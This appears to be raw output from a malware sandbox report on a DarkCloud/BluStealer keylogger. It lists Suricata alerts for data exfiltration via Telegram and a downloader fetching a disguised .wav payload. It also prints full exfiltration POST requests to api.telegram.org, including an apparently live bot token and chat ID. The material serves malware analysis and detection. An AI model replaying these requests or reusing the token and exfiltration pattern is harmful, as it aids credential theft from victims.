            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:60433 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.10:60433 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:60408 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.10:60408 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:60442 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.10:60442 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:60411 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.10:60411 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.10:60408 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:60388 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:60413 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.10:60388 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.10:60413 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.10:60442 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.10:60411 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.10:60413 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.10:60388 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:60410 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.10:60410 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.10:60410 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:60400 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.10:60400 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:60440 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:60428 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.10:60440 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.10:60428 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:60372 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.10:60372 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.10:60440 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.10:60428 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.10:60372 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:60454 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.10:60454 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.10:60454 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:60402 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.10:60402 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.10:60402 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.10:60400 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:60425 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.10:60425 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:60446 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.10:60446 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.10:60446 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:60415 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.10:60415 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.10:60415 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:60416 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.10:60416 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.10:60416 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.10:60433 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.10:60425 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:60441 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.10:60441 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.10:60441 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:60387 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:60451 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.10:60387 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.10:60451 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.10:60387 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:60436 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.10:60436 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.10:60436 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:60426 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.10:60426 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:60452 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.10:60452 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.10:60426 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.10:60452 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:60412 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.10:60412 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:60423 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.10:60423 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.10:60412 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.10:60423 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:60424 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.10:60424 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.10:60424 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:60419 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.10:60451 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.10:60419 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:60431 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.10:60431 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.10:60419 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.10:60431 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:60449 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.10:60449 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:60394 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.10:60394 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.10:60449 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.10:60394 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:60427 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.10:60427 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.10:60427 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:60379 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.10:60379 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.10:60379 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:60395 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.10:60395 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.10:60395 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:60418 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.10:60418 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.10:60418 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:60448 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.10:60448 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.10:60448 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:60396 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.10:60396 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.10:60396 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:60407 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.10:60407 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.10:60407 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:60429 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.10:60429 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.10:60429 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:60405 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.10:60405 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.10:60405 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:60406 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.10:60406 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.10:60406 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:60417 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.10:60417 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.10:60417 -> 149.154.167.220:443
            Uses the Telegram API (likely for C&C communication)
            Source: unknownDNS query: name: api.telegram.org
            Source: global trafficTCP traffic: 192.168.2.10:60364 -> 162.159.36.2:53
            Source: global trafficHTTP traffic detected: GET /Rzbiaxwk.wav HTTP/1.1Host: alcomax.com.coConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /Rzbiaxwk.wav HTTP/1.1Host: alcomax.com.coConnection: Keep-Alive
            Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
            Source: Joe Sandbox ViewIP Address: 162.55.60.2 162.55.60.2
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: unknownDNS query: name: showip.net
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.10:49716 -> 162.55.60.2:80
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.10:49793 -> 162.55.60.2:80
            Source: global trafficHTTP traffic detected: POST /bot7508829218:AAEwYuoUi01mE6iR0gIhF2Llmbtou-hlYgo/sendDocument?chat_id=1342702073&caption=DC-KL:::user-PC\user\8.46.123.189 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 6994Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /bot7508829218:AAEwYuoUi01mE6iR0gIhF2Llmbtou-hlYgo/sendDocument?chat_id=1342702073&caption=DC-KL:::user-PC\user\8.46.123.189 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 700Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /bot7508829218:AAEwYuoUi01mE6iR0gIhF2Llmbtou-hlYgo/sendDocument?chat_id=1342702073&caption=DC-KL:::user-PC\user\8.46.123.189 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 568Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /bot7508829218:AAEwYuoUi01mE6iR0gIhF2Llmbtou-hlYgo/sendDocument?chat_id=1342702073&caption=DC-KL:::user-PC\user\8.46.123.189 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 601Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /bot7508829218:AAEwYuoUi01mE6iR0gIhF2Llmbtou-hlYgo/sendDocument?chat_id=1342702073&caption=DC-KL:::user-PC\user\8.46.123.189 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 568Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /bot7508829218:AAEwYuoUi01mE6iR0gIhF2Llmbtou-hlYgo/sendDocument?chat_id=1342702073&caption=DC-KL:::user-PC\user\8.46.123.189 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 7366Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /bot7508829218:AAEwYuoUi01mE6iR0gIhF2Llmbtou-hlYgo/sendDocument?chat_id=1342702073&caption=DC-KL:::user-PC\user\8.46.123.189 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 601Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /bot7508829218:AAEwYuoUi01mE6iR0gIhF2Llmbtou-hlYgo/sendDocument?chat_id=1342702073&caption=DC-KL:::user-PC\user\8.46.123.189 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 667Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /bot7508829218:AAEwYuoUi01mE6iR0gIhF2Llmbtou-hlYgo/sendDocument?chat_id=1342702073&caption=DC-KL:::user-PC\user\8.46.123.189 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 601Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /bot7508829218:AAEwYuoUi01mE6iR0gIhF2Llmbtou-hlYgo/sendDocument?chat_id=1342702073&caption=DC-KL:::user-PC\user\8.46.123.189 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 601Connection: Keep-AliveCache-Control: no-cache
